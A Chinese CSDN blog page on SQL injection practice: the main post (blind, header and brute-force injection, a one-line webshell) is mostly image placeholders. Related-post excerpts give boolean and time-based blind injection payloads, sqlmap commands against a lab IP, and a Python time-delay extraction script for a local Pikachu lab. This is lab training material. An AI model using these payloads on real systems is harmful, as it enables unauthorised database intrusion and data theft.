sql盲注、头注与爆破练习

最新推荐文章于 2025-03-31 23:59:31 发布
最新推荐文章于 2025-03-31 23:59:31 发布
阅读量414 收藏
点赞数
分类专栏: SQL注入 安全 Personal feelings 文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43716322/article/details/89074170
版权

#0x01:SQL头注入
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

盲注

盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。

#0x02:基于boolean的盲注
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

#0x03:基于time的盲注
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

#0x04:sql暴力破解表名
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

#0x05:一句话木马

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
writed by 0xcc 4/8/2019.

sql注入之pikachu练习
windStudyer的专栏
05-21 906
sql注入pikachu之练习
BurpSuite 爆破 SQL 注入
MZa1213123的博客
03-03 2412
靶场 用 burpsuite 进行抓包 (最好是用专业版 可以设置多线程快速爆破) 右键该页面 Send to Intruder 首先将 Attack type 改为 Cluster bomb 接着 Clear 清除全部变量 然后 Add 变量到 username 和 password 的地方 设置 payload payload 1 选择 Runtime file 也就是自己选择的字典 我这个是 kali 自带的 SQL.txt payload 2 选择 Simple lis
sql练习
SUSUYUA的博客
02-19 278
sql分为基于布尔的以及基于时间的。本篇文章是在sqli环境下对于sql的联系实战
SQL注入技术详解
最新发布
si_feng_yi的博客
03-31 626
(Blind SQL Injection)是一种特殊的SQL注入技术,当应用程序不会直接返回数据错误信息或查询结果时使用。常规注入不同,需要通过应用程序的间接响应(如布尔状态、时间延迟)来推断数据。通过页面返回的真假状态判断SQL语句执行结果。通过数据响应时间延迟判断SQL语句执行结果。
墨者学院SQL注入漏洞测试(时间)爆破
weixin_54105551的博客
06-30 599
本文是关于墨者学院的sql注入的时间爆破的过程
Sql注入爆破--DVWA
HurryPotter
04-04 1429
Sql注入爆破: 工具:Sqlmap、BurpSuit 方法:利用BurpSuit抓包获取登录cookie进行爆破 DVWA级别:low 1)原理: 2)实战: BurpSuit抓包 在SQL Injection 输入栏输入:1 保存抓包数据 将抓包信息保存到本地文件test: Sqlmap暴力破解 开启Sqlmap,输入:sqlmap -r /root/De...
SQL篇之布尔
weixin_47785246的博客
07-11 3142
简单介绍SQL注入中的,通过靶场的练习,演示SQL的一些常用方法思路。
SQL注入(一)布尔
xiaoyang886_的博客
06-10 773
id=1' order by 1--+没变化 id=1' order by 2--+没变化 id=1' order by 3--+没变化?and (ascii(substr(database(),1,1)))=115--+ 返回正常,说明数据名称第一位是 s。
sql注入练习之bool
windStudyer的专栏
05-22 1288
1.bool的原理 以根据返回页面判断条件真假的注入 判断方式: 通过长度判断 length(): length(database())>=x 通过字符判断 substr():substr(database() ,1,1)= 's' 通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x 2.bool相关的函数 3.实验-bool 实验环境:phpstudy+apache+mysql+pikachu 3.1判断注入
SQL注入漏洞测试(布尔)
qq_52718293的博客
11-30 5369
一.sqlmap 1.查看名(测试后发现有5个) python sqlmap.py -u http://219.153.49.228:44485/new_list.php?id=1 --dbs 2.查看表明 python sqlmap.py -u http://219.153.49.228:44485/new_list.php?id=1 -D stormgroup --tables 3.查看字段名 python sqlmap.py -u http://219.153.49.228:44485/new_
sqli-labs-基于布尔的
zlloveyouforever的博客
04-29 1177
sqli-labs第五关--基于布尔的
SQL弱口令爆破
09-10
SQL弱口令爆破器 1433 自带密码生成器
sql注入-爆破数据
Eric___Qu的博客
03-24 995
order by原理:会对列排序,当我们输入的列数超过实际拥有的列数,就会提示该列不存在。假设users表里有username,password两个字段。使用order by判断回显后(假设回显结果为2),使用。假设flag数据里有users表,查看users表。假设需要查看的数据为flag。
sql注入
2301_80913334的博客
04-15 2179
sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为。简单来说就是页面没有报错回显,不知道数据具体返回值的情况下,对数据中的内容进行猜解,实现sql注入。web页面只返回True,False两种值。利用页面返回不同,逐个猜解数据1、布尔不推荐使用手但也需要了解其payload的构造;
[2021东软杯_WEB]easyinject (LDAP爆破)
Landasika的博客
12-06 822
关于ldap详细原理可以参考这两位大佬的博客: LDAP注入防御剖析_小太阳~-优快云博客_ldap注入 LDAP注入 - 看不尽的尘埃 - 博客园 目录 一、什么是LDAP? (一)目录服务 (二)LDAP的介绍: (三)为什么要使用 二、LDAP关于查询的基本语法 1、基本语法规则 2、四种常见的逻辑表达式来表示查询操作 三、LDAP注入 四、[2021东软杯_WEB]easyinject题解 一、什么是LDAP? 这一部分摘自这个大佬...
SQL-你需要知道的常用sql函数和语句
Brilliant_orange的博客
11-09 1145
小白 SQL注入 你需要知道的常用SQL语句和函数
SQL布尔常用语句
孤的博客
08-23 3162
过程 1.判断是否存在注入注入字符型还是数字型 2.猜解当前数据名 数据长度→名 3.数据中的表名 几个表→长度→名称 4.表中的字段名 字段个数→长度→名称 5.数据 判断 1’ and ‘1’=‘1 1’ and ‘1’='2 2.名 1’ and length(database())>3# 1’ and length(database())=5 # 1’ and mid...
练习(作业)
qq_43473164的博客
04-08 345
基于boolean的 第一步 测试 payload:’ and 1=1#(页面不变) | ’ and 1=2#(页面变化) 说明存在sql漏洞. 第二步 表:payload:’ and ascii(substr((select table_name from information_schema.tables where table_schema=database()),1,1)...
SQL注入漏洞——sql
xiaoheizi的博客
06-12 527
sleep(5) #SQL语句延时执行5秒 substr(a,b,c) #从位置b开始,截取字符串a的c长度 left(database(),1) #left(a,b)从左侧截取a的前b位 length(database())=8 #判断数据database()名的长度
pikachu时间
03-19
### 关于Pikachu时间SQL注入实验室 Pikachu是一款用于Web安全学习的靶场工具,它提供了多种类型的漏洞实验环境供用户练习,其中包括SQL注入中的时间类型。时间是一种通过延迟数据响应来判断条件真假的方式[^2]。 #### 时间原理 时间的核心在于利用数据函数(如`SLEEP()`或`WAITFOR DELAY`),使查询执行过程中产生人为可控的时间延迟。攻击者可以通过观察页面加载时间的不同,推断出后台数据的状态并逐步获取敏感数据[^1]。 #### Pikachu时间实现方式 在Pikachu靶场中,时间通常涉及以下操作: 1. **构造payload**: 使用`IF`语句配合`SLEEP()`函数构建延时逻辑。例如: ```sql IF(ASCII(SUBSTRING((SELECT database()),1,1))=98,SLEEP(5),NULL) ``` 上述payload表示如果当前数据名称的第一个字符等于ASCII码值为98,则触发5秒延迟;否则无任何动作。 2. **检测延迟**: 当发送上述请求后,服务器端处理耗时明显增加时,说明猜测正确。反之则错误。根据返回结果调整下一次试探位置直至完成整个字符串还原过程为止。 3. **自动化脚本编写**: 手动逐位爆破效率低下,在实际渗透测试场景下往往借助Burp Suite Intruder模块或者自定义Python脚本来加速这一流程。下面给出一个简单的Python示例代码片段展示如何自动提取目标表名首字母: ```python import requests url = 'http://localhost/pikachu/vul/time_sql.php' def check(payload): data = {'id': payload} start_time = time.time() response = requests.post(url, data=data) elapsed_time = time.time() - start_time return True if elapsed_time >= 5 else False ascii_min, ascii_max = 48, 122 while ascii_min <= ascii_max: mid = (ascii_min + ascii_max) // 2 test_payload = f"1' AND IF(ORD(MID((SELECT table_name FROM information_schema.tables WHERE table_schema='test'),1,1))>{mid}, SLEEP(5), NULL)-- " if check(test_payload): ascii_min = mid + 1 else: ascii_max = mid - 1 result_char = chr(mid) print(f"The first character of the target table name is {result_char}.") ``` #### 意事项 尽管此类练习有助于理解SQL注入的工作机制及其危害程度,但在真实环境中实施类似行为可能违反法律,请务必仅限于授权范围内开展研究活动[^5]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值